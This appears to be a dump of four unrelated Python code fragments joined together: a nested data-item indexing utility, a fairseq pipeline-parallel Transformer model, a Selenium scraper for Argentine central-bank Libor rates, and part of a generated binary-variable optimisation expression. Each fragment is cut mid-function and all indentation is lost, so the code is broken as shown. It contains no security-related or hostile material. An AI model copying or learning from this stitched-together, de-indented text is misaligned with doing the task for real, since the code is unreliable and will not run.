"""Trims a newted data item to limit number of a nested property
:param tree: a nested data item or a list of such items
:param prop: the property to trim. It is assumed that values of
property are either a single nested data item or a list of nested
data items.
:param depth: int maximum number of property jumps to follow from tree
:returns: a trimmed version of the input tree
:rtype: dict or list of dicts
"""
assert type(prop) is str, '%s: %s' % (type(prop), prop)
if type(depth) is not int or depth < 0:
raise ValueError('depth %s' % (depth))
if type(tree) is list:
return [trim_tree(sub, prop, depth) for sub in tree]
if not content.is_item(tree):
return tree
if prop not in tree:
return tree
result = {**tree}
if depth == 0:
del result[prop]
else: # depth > 0
result[prop] = trim_tree(result[prop], prop, depth - 1)
return result
def filter_ident_index_by_type(ident_index, qtypes):
"""Filter an ident_index selecting only entries matching the query types
:param ident_index:
:param qtypes: a single typename or a list of typenames to match
:returns:
:rtype:
"""
if type(qtypes) is str:
return filter_ident_index_by_type(ident_index, [qtypes])
assert type(qtypes) is list
return {k: v
for k, v in ident_index.items()
if content.is_item(v) and content.item_matches_type(v, qtypes)}
def partition_ident_index(ident_index, partition_types):
"""Creates an index partitioned by types
:param ident_index: an identity item index; i.e. a dict with
identifiers as keys and data items as values
:param partition_types: a dict specifying the partition labels and
types to include in each partition. The dict must have strings
as keys and list of type names as values. We assume that the
types are disjoint.
:returns: a partitioned index. This is a dict with as keys the
label for each partition and as values a subset of the input
`ident_index`. An invariant is that merging all the values in
the result yields the same as `ident_index`
:rtype: dict
"""
assert type(partition_types) is dict
assert '_rest' not in partition_types, 'partition label _rest is reserved'
result = {plabel: {}
for plabel, pqtypes in partition_types.items()}
result['_rest'] = {}
for ident, item in ident_index.items():
if content.is_item(item):
matching_plabels = [
partition_label
for partition_label, partition_qtypes in partition_types.items()
if content.item_matches_type(item, partition_qtypes)]
if len(matching_plabels) > 1:
logger.warning('Multiple partitions match item %s: %s' % (ident, matching_plabels))
result[matching_plabels[0]][ident] = item
elif len(matching_plabels) == 1:
result[matching_plabels[0]][ident] = item
else:
result['_rest'][ident] = item
return result
def index_ident_tree(tree, cfg):
"""Converts a tree item into an index dict
:param tree: a possibly nested value data structure which may
contain data items. All data items must have an identifier or
other identifying field.
:param cfg: configuration options
:returns: an identifier index for the tree; it contains identifier
strings as keys and branches of the input tree as values. Note
that the tree and its branches are not modified at all. For a
more trimmed index, you may want to map the values using the
`item_with_refs` method.
:rtype: dict
"""
if type(tree) is list:
result = {}
for it in tree:
result = _index_merge(result, index_ident_tree(it, cfg), cfg)
return result
elif type(tree) is dict:
result = {}
# first build index for any nested values
for k, v in tree.items():
if k in cfg.get('composite_rels', []):
continue
result = _index_merge(result, index_ident_tree(v, cfg), cfg)
# finally, add entries for this item if it's an identifiable type
if content.is_item(tree) and tree['@type'] not in no_ident_types:
ids = get_item_identifiers(tree, cfg)
assert len(ids) > 0, 'Cannot index an item without identifiers'
if cfg.get('unique_id_index', False):
ids = ids[:1] # keep only the first id
for idval in ids:
assert type(idval) == str
result = _index_merge(result, {idval: tree}, cfg)
return result
else: # assume simple values, these are never indexed
return {}
def _index_merge(idx_a, idx_b, cfg):
validate_is_item_index(idx_a)
validate_is_item_index(idx_b)
shared_keys = set(idx_a.keys()) & set(idx_b.keys())
if len(shared_keys) == 0:
return {**idx_a, **idx_b}
else:
result = {**idx_a, **idx_b}
for k in shared_keys:
result[k] = {**idx_a[k], **idx_b[k]}
return result
def validate_is_item_index(idx):
if type(idx) is not dict:
raise ValueError('Object is not an item index. It must be a dict, not %s' % (type(idx)))
if len(idx) == 0: # empty indices are OK
return True
key_types = list(set([type(k) for k in idx.keys()]))
if key_types != [str]:
raise ValueError('At least one key is not a string %s' % (list(idx.keys())))
val_types = list(set([type(v) for k, v in idx.items()]))
if val_types != [dict]:
raise ValueError('At least one value is not a dict')
return True
# list of types which do not require an ident
no_ident_types = ['MediaObject', 'Timing', "schema:Language", "Thing",
"schema:CreativeWork", 'CreativeWork',
'nif:String', 'schema:Rating', 'schema:ClaimReview', 'ClaimReview']
no_url_types = no_ident_types + ['Dataset', 'SentencePair']
def ensure_ident(item, cfg):
"""Creates a copy of the input tree whereby all the items have a unique identifier
:param item: a datastructure nested schema.org compatible item
:param cfg: config options
:returns: a copy of tree but any item and subitem in the tree has
a unique identifier field
:rtype: any
"""
if type(item) == list:
return [ensure_ident(it, cfg) for it in item]
if type(item) == dict:
assert dictu.is_value(item)
result = {k: ensure_ident(v, cfg) for k, v in item.items()}
if content.is_item(result):
if 'identifier' in item:
return result
elif item['@type'] in no_ident_types:
return result
else:
return {**result,
'identifier': calc_identifier(result, cfg)}
else: # no ident is needed
return {**item}
# all other types are returned as they are
return item
def ensure_url(item, cfg):
"""Creates a copy of the input tree whereby all the items have a url value
:param item: a datastructure nested schema.org compatible item
:param cfg: config options
:returns: a copy of tree but any suitable item and subitem in the tree has
a url field
:rtype: any
"""
if type(item) == list:
return [ensure_url(it, cfg) for it in item]
if type(item) == dict:
assert dictu.is_value(item)
result = {k: ensure_url(v, cfg) for k, v in item.items()}
if content.is_item(result):
if 'url' in item:
# optionally, make sure it matches the calculated url
# if not a match, replace url value and put old value in sameAs?
return result
elif item['@type'] in no_url_types:
return result
else:
return {**result,
'url': calc_item_url(result, cfg)}
else: # no ident is needed
return {**item}
# all other types are returned as they are
return item
def calc_identifier(item, cfg):
"""Given a data item, calculate its identifier
Any nested items must already have an identifier.
The default identifier is given by a subset of its fields.
:param item: The item for which to calculate the identifier
:param cfg: config | |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import utils
from fairseq.model_parallel.models.pipeline_parallel_transformer.layers import (
Embedding,
TransformerDecoderEmbedding,
TransformerDecoderLayer,
TransformerDecoderOutputLayer,
TransformerEncoderEmbedding,
TransformerEncoderLayer,
TransformerEncoderLayerNorm,
)
from fairseq.models import (
BaseFairseqModel,
FairseqDecoder,
FairseqEncoder,
register_model,
register_model_architecture,
)
from fairseq.models.fairseq_encoder import EncoderOut
from fairseq.models.transformer import (
base_architecture,
transformer_iwslt_de_en,
transformer_wmt_en_de_big,
)
from fairseq.modules import SinusoidalPositionalEmbedding
logger = logging.getLogger(__name__)
DEFAULT_MAX_SOURCE_POSITIONS = 1024
DEFAULT_MAX_TARGET_POSITIONS = 1024
@register_model("pipeline_parallel_transformer")
class PipelineParallelTransformerModel(BaseFairseqModel):
def __init__(self, encoder, decoder, balance, devices, chunks, checkpoint):
try:
from fairscale.nn import Pipe
except ImportError:
raise ImportError("Please install fairscale with: pip install fairscale")
super().__init__()
assert isinstance(encoder, FairseqEncoder)
assert isinstance(decoder, FairseqDecoder)
encoder_module_list = (
[encoder.embedding_layer]
+ list(encoder.encoder_layers)
+ [encoder.final_layer_norm]
)
self.num_encoder_modules = len(encoder_module_list)
decoder_module_list = (
[decoder.embedding_layer]
+ list(decoder.decoder_layers)
+ [decoder.decoder_output_layer]
)
self.num_decoder_modules = len(decoder_module_list)
module_list = encoder_module_list + decoder_module_list
self.devices = devices
self.model = Pipe(
nn.Sequential(*module_list),
balance=balance,
devices=devices,
chunks=chunks,
checkpoint=checkpoint,
)
self.encoder_max_positions = self.max_positions_helper(
encoder.embedding_layer, "max_source_positions"
)
self.decoder_max_positions = self.max_positions_helper(
decoder.embedding_layer, "max_target_positions"
)
self.adaptive_softmax = getattr(decoder, "adaptive_softmax", None)
# Note: To be populated during inference
self.encoder = None
self.decoder = None
def forward(self, src_tokens, src_lengths, prev_output_tokens):
if self.training:
input_lst = [src_tokens, src_lengths, prev_output_tokens]
input = tuple(i.to(self.devices[0], non_blocking=True) for i in input_lst)
return self.model(input)
else:
assert self.encoder is not None and self.decoder is not None, (
"encoder and decoder need to be initialized by "
+ "calling the `prepare_for_inference_()` method"
)
encoder_output_tuple = self.encoder(input)
return self.decoder(encoder_output_tuple)
def prepare_for_inference_(self, cfg):
if self.encoder is not None and self.decoder is not None:
logger.info("Encoder and Decoder already initialized")
return
encoder_module_list = []
decoder_module_list = []
module_count = 0
for partition in self.model.partitions:
for module in partition:
if module_count < self.num_encoder_modules:
encoder_module_list.append(module)
else:
decoder_module_list.append(module)
module_count += 1
self.model = None
self.encoder = TransformerEncoder(cfg.model, None, None, encoder_module_list)
self.decoder = TransformerDecoder(
cfg.model, None, None, decoder_module_list=decoder_module_list
)
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
# fmt: off
parser.add_argument('--activation-fn',
choices=utils.get_available_activation_fns(),
help='activation function to use')
parser.add_argument('--dropout', type=float, metavar='D',
help='dropout probability')
parser.add_argument('--attention-dropout', type=float, metavar='D',
help='dropout probability for attention weights')
parser.add_argument('--activation-dropout', '--relu-dropout', type=float, metavar='D',
help='dropout probability after activation in FFN.')
parser.add_argument('--encoder-embed-path', type=str, metavar='STR',
help='path to pre-trained encoder embedding')
parser.add_argument('--encoder-embed-dim', type=int, metavar='N',
help='encoder embedding dimension')
parser.add_argument('--encoder-ffn-embed-dim', type=int, metavar='N',
help='encoder embedding dimension for FFN')
parser.add_argument('--encoder-layers', type=int, metavar='N',
help='num encoder layers')
parser.add_argument('--encoder-attention-heads', type=int, metavar='N',
help='num encoder attention heads')
parser.add_argument('--encoder-normalize-before', action='store_true',
help='apply layernorm before each encoder block')
parser.add_argument('--encoder-learned-pos', action='store_true',
help='use learned positional embeddings in the encoder')
parser.add_argument('--decoder-embed-path', type=str, metavar='STR',
help='path to pre-trained decoder embedding')
parser.add_argument('--decoder-embed-dim', type=int, metavar='N',
help='decoder embedding dimension')
parser.add_argument('--decoder-ffn-embed-dim', type=int, metavar='N',
help='decoder embedding dimension for FFN')
parser.add_argument('--decoder-layers', type=int, metavar='N',
help='num decoder layers')
parser.add_argument('--decoder-attention-heads', type=int, metavar='N',
help='num decoder attention heads')
parser.add_argument('--decoder-learned-pos', action='store_true',
help='use learned positional embeddings in the decoder')
parser.add_argument('--decoder-normalize-before', action='store_true',
help='apply layernorm before each decoder block')
parser.add_argument('--share-decoder-input-output-embed', action='store_true',
help='share decoder input and output embeddings')
parser.add_argument('--share-all-embeddings', action='store_true',
help='share encoder, decoder and output embeddings'
' (requires shared dictionary and embed dim)')
parser.add_argument('--no-token-positional-embeddings', default=False, action='store_true',
help='if set, disables positional embeddings (outside self attention)')
parser.add_argument('--adaptive-softmax-cutoff', metavar='EXPR',
help='comma separated list of adaptive softmax cutoff points. '
'Must be used with adaptive_loss criterion'),
parser.add_argument('--adaptive-softmax-dropout', type=float, metavar='D',
help='sets adaptive softmax dropout for the tail projections')
parser.add_argument('--num-embedding-chunks', type=int, metavar='N', default=1,
help='Number of embedding layer chunks (enables more even distribution'
'of optimizer states across data parallel nodes'
'when using optimizer state sharding and'
'a big embedding vocabulary)')
# fmt: on
@classmethod
def build_model_base(cls, args, task):
"""Build a new model instance."""
# make sure all arguments are present in older models
base_architecture(args)
if not hasattr(args, "max_source_positions"):
args.max_source_positions = DEFAULT_MAX_SOURCE_POSITIONS
if not hasattr(args, "max_target_positions"):
args.max_target_positions = DEFAULT_MAX_TARGET_POSITIONS
src_dict, tgt_dict = task.source_dictionary, task.target_dictionary
def build_embedding(dictionary, embed_dim, path=None, num_embed_chunks=1):
assert embed_dim % num_embed_chunks == 0, (
f"Number of embedding chunks = {num_embed_chunks} should be "
+ f"divisible by the embedding dimension = {embed_dim}"
)
assert path is None or num_embed_chunks == 1, (
"Loading embedding from a path with number of embedding chunks > 1"
+ " is not yet supported"
)
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
# if provided, load from preloaded dictionaries
if path:
emb = Embedding(num_embeddings, embed_dim, padding_idx)
embed_dict = utils.parse_embedding(path)
utils.load_embedding(embed_dict, dictionary, emb)
else:
embed_chunk_dim = embed_dim // num_embed_chunks
emb = nn.ModuleList()
for i in range(num_embed_chunks):
emb.append(Embedding(num_embeddings, embed_chunk_dim, padding_idx))
return emb
num_embed_chunks = args.num_embedding_chunks
if args.share_all_embeddings:
if src_dict != tgt_dict:
raise ValueError("--share-all-embeddings requires a joined dictionary")
if args.encoder_embed_dim != args.decoder_embed_dim:
raise ValueError(
"--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim"
)
if args.decoder_embed_path and (
args.decoder_embed_path != args.encoder_embed_path
):
raise ValueError(
"--share-all-embeddings not compatible with --decoder-embed-path"
)
encoder_embed_tokens = build_embedding(
src_dict,
args.encoder_embed_dim,
args.encoder_embed_path,
num_embed_chunks,
)
decoder_embed_tokens = encoder_embed_tokens
args.share_decoder_input_output_embed = True
else:
assert args.share_decoder_input_output_embed or num_embed_chunks == 1, (
"Not sharing decoder I/O embeddings is not yet supported with number of "
+ "embedding chunks > 1"
)
encoder_embed_tokens = build_embedding(
src_dict,
args.encoder_embed_dim,
args.encoder_embed_path,
num_embed_chunks,
)
decoder_embed_tokens = build_embedding(
tgt_dict,
args.decoder_embed_dim,
args.decoder_embed_path,
num_embed_chunks,
)
encoder = cls.build_encoder(args, src_dict, encoder_embed_tokens)
decoder = cls.build_decoder(args, tgt_dict, decoder_embed_tokens)
return (encoder, decoder)
@classmethod
def build_encoder(cls, args, src_dict, embed_tokens):
return TransformerEncoder(args, src_dict, embed_tokens)
@classmethod
def build_decoder(cls, args, tgt_dict, embed_tokens):
return TransformerDecoder(args, tgt_dict, embed_tokens)
@classmethod
def build_model(cls, args, task):
encoder, decoder = cls.build_model_base(args, task)
return PipelineParallelTransformerModel(
encoder=encoder,
decoder=decoder,
balance=utils.eval_str_list(args.pipeline_balance, type=int),
devices=utils.eval_str_list(args.pipeline_devices, type=int),
chunks=args.pipeline_chunks,
checkpoint=args.pipeline_checkpoint,
)
def output_layer(self, features, **kwargs):
"""Project features to the default output size (typically vocabulary size)."""
return self.decoder.output_layer(features, **kwargs)
def max_positions(self):
"""Maximum length supported by the model."""
return (self.encoder_max_positions, self.decoder_max_positions)
def max_positions_helper(
self, embedding_layer, max_positions_field="max_source_positions"
):
"""Maximum input length supported by the encoder or decoder."""
if embedding_layer.embed_positions is None:
return getattr(embedding_layer, max_positions_field)
return min(
getattr(embedding_layer, max_positions_field),
embedding_layer.embed_positions.max_positions,
)
def get_normalized_probs(self, net_output, log_probs, sample=None):
"""Get normalized probabilities (or log probs) from a net's output."""
if hasattr(self, "adaptive_softmax") and self.adaptive_softmax is not None:
if sample is not None:
assert "target" in sample
target = sample["target"]
else:
target = None
out = self.adaptive_softmax.get_log_prob(net_output, target=target)
return out.exp_() if not log_probs else out
# A Pipe() module returns a tuple of tensors as the output.
# In this case, the tuple has one element - the output tensor of logits
logits = net_output if isinstance(net_output, torch.Tensor) else net_output[0]
if log_probs:
return utils.log_softmax(logits, dim=-1, onnx_trace=False)
else:
return utils.softmax(logits, dim=-1, onnx_trace=False)
def max_decoder_positions(self):
"""Maximum length supported by the decoder."""
return self.decoder_max_positions
def load_state_dict(self, state_dict, strict=True, cfg=None):
"""Copies parameters and buffers from *state_dict* into this module and
its descendants.
Overrides the method in :class:`nn.Module`. Compared with that method
this additionally "upgrades" *state_dicts* from old checkpoints.
"""
self.upgrade_state_dict(state_dict)
is_regular_transformer = not any("model.partitions" in k for k in state_dict)
if is_regular_transformer:
state_dict = self.convert_to_pipeline_parallel_state_dict(state_dict)
return super().load_state_dict(state_dict, strict)
def convert_to_pipeline_parallel_state_dict(self, state_dict):
new_state_dict = self.state_dict()
encoder_layer_idx = 0
decoder_layer_idx = 0
encoder_key_suffixes = [
"self_attn.k_proj.weight",
"self_attn.k_proj.bias",
"self_attn.v_proj.weight",
"self_attn.v_proj.bias",
"self_attn.q_proj.weight",
"self_attn.q_proj.bias",
"self_attn.out_proj.weight",
"self_attn.out_proj.bias",
"self_attn_layer_norm.weight",
"self_attn_layer_norm.bias",
"fc1.weight",
"fc1.bias",
"fc2.weight",
"fc2.bias",
"final_layer_norm.weight",
"final_layer_norm.bias",
]
decoder_key_suffixes = [
"self_attn.k_proj.weight",
"self_attn.k_proj.bias",
"self_attn.v_proj.weight",
"self_attn.v_proj.bias",
"self_attn.q_proj.weight",
"self_attn.q_proj.bias",
"self_attn.out_proj.weight",
"self_attn.out_proj.bias",
"self_attn_layer_norm.weight",
"self_attn_layer_norm.bias",
"encoder_attn.k_proj.weight",
"encoder_attn.k_proj.bias",
"encoder_attn.v_proj.weight",
"encoder_attn.v_proj.bias",
"encoder_attn.q_proj.weight",
"encoder_attn.q_proj.bias",
"encoder_attn.out_proj.weight",
"encoder_attn.out_proj.bias",
"encoder_attn_layer_norm.weight",
"encoder_attn_layer_norm.bias",
"fc1.weight",
"fc1.bias",
"fc2.weight",
"fc2.bias",
"final_layer_norm.weight",
"final_layer_norm.bias",
]
for pid, partition in enumerate(self.model.partitions):
logger.info(f"Begin Partition {pid}")
for mid, module in enumerate(partition):
# fmt: off
if isinstance(module, TransformerEncoderEmbedding):
new_state_dict[f'model.partitions.{pid}.{mid}.embed_tokens.weight'] = state_dict['encoder.embed_tokens.weight']
new_state_dict[f'model.partitions.{pid}.{mid}.embed_positions._float_tensor'] = state_dict['encoder.embed_positions._float_tensor']
if isinstance(module, TransformerEncoderLayer):
for suffix in encoder_key_suffixes:
new_state_dict[f'model.partitions.{pid}.{mid}.{suffix}'] = state_dict[f'encoder.layers.{encoder_layer_idx}.{suffix}']
encoder_layer_idx += 1
if isinstance(module, TransformerDecoderLayer):
for suffix in decoder_key_suffixes:
new_state_dict[f'model.partitions.{pid}.{mid}.{suffix}'] = state_dict[f'decoder.layers.{decoder_layer_idx}.{suffix}']
decoder_layer_idx += 1
if isinstance(module, TransformerEncoderLayerNorm):
if 'encoder.layer_norm.weight' in state_dict:
new_state_dict[f'model.partitions.{pid}.{mid}.layer_norm.weight'] = state_dict['encoder.layer_norm.weight']
new_state_dict[f'model.partitions.{pid}.{mid}.layer_norm.bias'] = state_dict['encoder.layer_norm.bias']
if isinstance(module, TransformerDecoderEmbedding):
new_state_dict[f'model.partitions.{pid}.{mid}.embed_tokens.weight'] = state_dict['decoder.embed_tokens.weight']
new_state_dict[f'model.partitions.{pid}.{mid}.embed_positions._float_tensor'] = state_dict['decoder.embed_positions._float_tensor']
if isinstance(module, TransformerDecoderOutputLayer):
new_state_dict[f'model.partitions.{pid}.{mid}.output_projection.weight'] = state_dict['decoder.output_projection.weight']
# fmt: on
return new_state_dict
class TransformerEncoder(FairseqEncoder):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
args (argparse.Namespace): parsed command-line arguments
dictionary (~fairseq.data.Dictionary): encoding dictionary
embed_tokens (torch.nn.Embedding): input embedding
"""
def __init__(self, args, dictionary, embed_tokens, encoder_module_list=None):
super().__init__(dictionary)
self.register_buffer("version", torch.Tensor([3]))
try:
from fairscale.nn import Pipe
except ImportError:
raise ImportError("Please install fairscale with: pip install fairscale")
if encoder_module_list is None:
embedding_layer = TransformerEncoderEmbedding(args, embed_tokens)
layers = [TransformerEncoderLayer(args) for i in range(args.encoder_layers)]
if isinstance(embed_tokens, nn.ModuleList):
emb_dim = sum(e.embedding_dim for e in embed_tokens)
else:
emb_dim = embed_tokens.embedding_dim
final_layer_norm = TransformerEncoderLayerNorm(args, emb_dim)
encoder_module_list | |
<filename>bcra_scraper/scraper_libor.py<gh_stars>1-10
from csv import DictWriter
from datetime import date, timedelta, datetime
from decimal import Decimal
from functools import reduce
import logging
import os
from bs4 import BeautifulSoup
from selenium.webdriver.common.keys import Keys
import pandas as pd
import progressbar
from bcra_scraper.scraper_base import BCRAScraper
from bcra_scraper.exceptions import InvalidConfigurationError
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException, NoSuchElementException, WebDriverException
class BCRALiborScraper(BCRAScraper):
"""
Clase que representa un Scraper para la tasa Libor del
BCRA (Banco Central de la República Argentina).
Attributes
----------
url : str
Una cadena que representa una url válida, usada para obtener
el contenido a ser scrapeado
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
Methods
-------
fetch_contents(start_date, end_date)
Obtiene los contenidos a ser parseados
fetch_day_content(single_date)
Obtiene el contenido para una determinada fecha
parse_contents(start_date, end_date)
Recibe un iterable de contenidos y devuelve un iterable con la
información scrapeada
parse_day_content(content)
Recibe un contenido, lo scrapea y lo devuelve como un iterable
preprocess_rows(rates, rows)
Recibe un diccionario con los valores para los plazos en días
de la tasa y un iterable con los contenidos scrapeados, y devuelve
un iterable con la información normalizada
preprocess_header(self, rates, header)
Recibe un diccionario con los valores para los plazos en días
de la tasa y una lista con los header que seran estandarizados
run(start_date, end_date)
Llama a los métodos que obtienen y scrapean los contenidos
y los devuelve en un iterable
"""
def __init__(self, url, rates, intermediate_panel_path, *args, **kwargs):
"""
Parameters
----------
url : str
Una cadena que representa una url válida, usada para obtener
el contenido a ser scrapeado. Una URL se considera válida cuando su
contenido no está vacio.
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
"""
self.rates = rates
self.intermediate_panel_path = intermediate_panel_path
super(BCRALiborScraper, self).__init__(url, *args, **kwargs)
def fetch_contents(self, start_date, end_date, intermediate_panel_data, fetched_contents):
"""
Recorre un rango de fechas y llama a un método.
Retorna un iterable donde cada elemento es un String, o una lista
vacía si no hay contenidos.
Parameters
----------
start_date : date
fecha de inicio que va a tomar como referencia el scraper
end_date: date
fecha de fin que va a tomar como referencia el scraper
"""
contents = {}
day_count = (end_date - start_date).days + 1
cont = 0
bar = progressbar.ProgressBar(max_value=day_count, redirect_stdout=True, \
widgets=[progressbar.Bar('=', '[', ']'), '', progressbar.Percentage()])
bar.start()
for single_date in (start_date + timedelta(n)
for n in range(day_count)):
if single_date not in fetched_contents:
in_panel, day_content = self.day_content_in_panel(intermediate_panel_data, single_date)
if not in_panel:
contents[single_date] = self.fetch_day_content(single_date)
else:
logging.warning(f'La fecha {single_date} fue descargada en el primer ciclo.')
cont += 1
bar.update(cont)
bar.finish()
return contents
def empty_fetched_contents(self):
return {}
def day_content_in_panel(self, intermediate_panel_data, single_date):
"""
Recibe la data del panel intermedio y una fecha.
Obtiene la data del panel para ese día.
Parameters
----------
single_date : date
intermediate_panel_data: dict
"""
in_panel, content = False, {}
content = intermediate_panel_data.get(single_date, {})
if content:
in_panel = True
return in_panel, content
def fetch_day_content(self, single_date):
"""
Ingresa al navegador y retorna un html correspondiente a la fecha
que recibe
Parameters
----------
single_date : date
fecha que va a tomar como referencia el scraper
"""
content = ''
counter = 1
tries = self.tries
while counter <= tries and not content:
try:
browser_driver = self.get_browser_driver()
browser_driver.get(self.url)
element_present = EC.presence_of_element_located(
(By.NAME, 'fecha')
)
element = WebDriverWait(browser_driver, 0).until(element_present)
element.send_keys(single_date.strftime("%d/%m/%Y") + Keys.RETURN)
content = browser_driver.page_source
except NoSuchElementException:
logging.warning(
f'No se encontró la fecha {single_date}. Reintentando...'
)
counter = counter + 1
except (TimeoutException, WebDriverException):
if counter < tries:
logging.warning(
f'La conexion de internet ha fallado para la fecha {single_date}. Reintentando...'
)
counter = counter + 1
else:
logging.warning(
f'Cantidad máxima de intentos alcanzada para la fecha {single_date}'
)
return content
return content
def parse_contents(self, contents, start_date, end_date, intermediate_panel_data):
"""
Retorna un iterable donde cada elemento es un String, o una lista
vacía si no hay contenidos.
Parameters
----------
contents : Iterable
Contenidos que van a ser parseados
"""
parsed_contents = {}
day_count = (end_date - start_date).days + 1
for single_date in (start_date + timedelta(n)
for n in range(day_count)):
in_panel, parsed = self.day_content_in_panel(intermediate_panel_data, single_date)
if in_panel:
parsed_contents[single_date] = parsed
else:
if single_date in contents:
parsed = self.parse_day_content(single_date, contents[single_date])
_parsed = self._preprocess_rows(parsed)
parsed_contents[single_date] = _parsed
intermediate_panel_data[single_date] = _parsed
return parsed_contents, intermediate_panel_data
def parse_day_content(self, single_date, content):
"""
Retorna un iterable con el contenido scrapeado cuyo formato
posee el indice de tiempo y los plazos en días de la tasa
Parameters
----------
content : str
Recibe un string con la información que será parseada
"""
soup = BeautifulSoup(content, "html.parser")
parsed = {'indice_tiempo': single_date, '30': '', '60': '', '90': '', '180': '', '360': ''}
try:
table = soup.find('table')
body = table.find('tbody')
rows = body.find_all('tr')
for row in rows:
validation_list = {}
cols = row.find_all('td')
if cols[0].text in self.rates.keys():
validation_list[cols[0].text] = cols[1].text
for r in validation_list.keys():
valid = self.rates_config_validator(r, self.rates)
if valid:
parsed[cols[0].text] = cols[1].text
else:
continue
return parsed
except:
return parsed
def rates_config_validator(self, parsed, rates):
"""Valida que parsed exista dentro de
los valores de rates en el archivo de
configuración
Parameters
----------
parsed : String
String con la clave correspondiente al plazo en días
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
"""
if f'libor_{parsed}_dias' in rates.values():
return True
else:
raise InvalidConfigurationError(
f'La clave libor_{parsed}_dias ' +
'no se encuentra en el archivo de config'
)
def _preprocess_rows(self, parsed):
parsed = self.preprocess_rows(self.rates, parsed)
return parsed
def preprocess_rows(self, rates, rows):
"""
Retorna un iterable con el contenido estandarizado
Parameters
----------
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
rows : Iterable
Iterable que contiene la información scrapeada
"""
preprocessed_row = {}
if type(rows['indice_tiempo']) == str:
preprocessed_row['indice_tiempo'] = date.fromisoformat(
rows['indice_tiempo']
)
else:
preprocessed_row['indice_tiempo'] = rows['indice_tiempo']
for rate in rates:
if rate in rows:
if rows[rate]:
preprocessed_row[rates[rate]] = Decimal(
str(rows[rate]).replace(',', '.')
)/100
else:
preprocessed_row[rates[rate]] = None
else:
preprocessed_row[rates[rate]] = rows[rates[rate]]
return preprocessed_row
def preprocess_header(self, rates):
"""
Retorna un iterable con los encabezados estandarizados
Parameters
----------
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
"""
preprocessed_header = []
preprocessed_header.append('indice_tiempo')
for value in rates.values():
preprocessed_header.append(value)
return preprocessed_header
def get_intermediate_panel_data_from_parsed(self, parsed):
"""
Recorre parsed y por cada plazo en días genera un diccionario
obteniendo por separado las claves que se utilizaran como headers,
y sus valores.
Parameters
----------
parsed : dict
"""
intermediate_panel_data = self.parsed_to_panel_dataframe(parsed)
return intermediate_panel_data
def parsed_to_panel_dataframe(self, parsed):
"""
Recibe un diccionario, y a partir de sus valores crea el dataframe del panel.
Devuelve una lista de diccionarios con los datos del panel a partir de lo que recibe.
Parameters
----------
parsed: dict
"""
def create_multi_index_column(field_title):
"""Crea multi index desarmando el título de un campo."""
libor, day_type, days = field_title.split("_")
return (day_type, days)
df = pd.DataFrame(parsed.values()).set_index("indice_tiempo")
df = df[['libor_30_dias', 'libor_60_dias', 'libor_90_dias', 'libor_180_dias', 'libor_360_dias']]
df.sort_index(inplace=True)
df.columns = pd.MultiIndex.from_tuples([create_multi_index_column(col) for col in df.columns])
df.columns = df.columns.droplevel(level=1)
df_panel = df.stack([-1], dropna=False).reset_index()
df_panel.columns = ["indice_tiempo", "type", "value"]
df_panel["indice_tiempo"] = df_panel["indice_tiempo"].apply(lambda x: x)
df_panel["value"] = df_panel["value"].apply(lambda x: x if x and x > 0 else None)
panel_data = df_panel.to_dict(orient='records')
return panel_data
def write_intermediate_panel(self, rows, intermediate_panel_path):
"""
Escribe el panel intermedio.
Parameters
----------
rows: Iterable
"""
header = ['indice_tiempo', 'type', 'value']
with open(os.path.join(intermediate_panel_path), 'w') as intermediate_panel:
writer = DictWriter(intermediate_panel, fieldnames=header)
writer.writeheader()
writer.writerows(rows)
def save_intermediate_panel(self, parsed):
"""
Llama a un método para obtener la data del panel intermedio
y a otro método pasandole esa data para que la escriba.
Parameters
----------
parsed: Iterable
"""
intermediate_panel_data = self.get_intermediate_panel_data_from_parsed(
parsed
)
self.write_intermediate_panel(intermediate_panel_data, self.intermediate_panel_path)
def parse_from_intermediate_panel(self):
"""
Lee el dataframe del panel intermedio.
Regresa una lista con un diccionario por cada fecha
Parameters
----------
start_date : date
Fecha de inicio que toma como referencia el scraper
end_date : date
fecha de fin que va a tomar como referencia el scraper
"""
parsed = {}
df_panel = self.read_intermediate_panel_dataframe()
parsed = self.get_parsed(df_panel)
return parsed
def get_parsed(self, df_panel):
"""
Recibe un dataframe a partir del cual genera una tabla pivot.
| |
2*m.b85*m.b396 - 2*m.b85*
m.b398 + 2*m.b85*m.b431 + 2*m.b85*m.b548 + 2*m.b87*m.b324 - 2*m.b87 + 2*m.b87*m.b334 - 2*
m.b334 - 2*m.b87*m.b387 - 2*m.b87*m.b389 + 2*m.b87*m.b478 - 2*m.b478 + 2*m.b87*m.b499 - 2*
m.b88*m.b398 + 2*m.b88 - 2*m.b88*m.b523 + 2*m.b89*m.b284 - 3*m.b89 + 2*m.b89*m.b304 - 2*m.b89*
m.b387 - 2*m.b89*m.b389 + 2*m.b89*m.b391 + 2*m.b89*m.b478 + 2*m.b89*m.b499 - 2*m.b90*m.b384 +
4*m.b90 - 2*m.b90*m.b392 - 2*m.b90*m.b396 + 2*m.b90*m.b439 - 2*m.b439 - 2*m.b90*m.b517 + 4*
m.b517 - 2*m.b90*m.b521 + 4*m.b521 - 2*m.b91*m.b389 + 2*m.b91*m.b499 - 2*m.b92*m.b385 + 4*
m.b92 - 2*m.b92*m.b386 - 2*m.b92*m.b395 - 2*m.b92*m.b397 + 2*m.b92*m.b453 - 4*m.b453 + 2*m.b92
*m.b466 - 2*m.b92*m.b520 - 2*m.b92*m.b522 + 3*m.b522 - 2*m.b93*m.b389 + 2*m.b93 - 2*m.b93*
m.b395 + 2*m.b93*m.b499 - 2*m.b93*m.b520 - 2*m.b96*m.b393 + 2*m.b96 - 2*m.b96*m.b518 + 4*
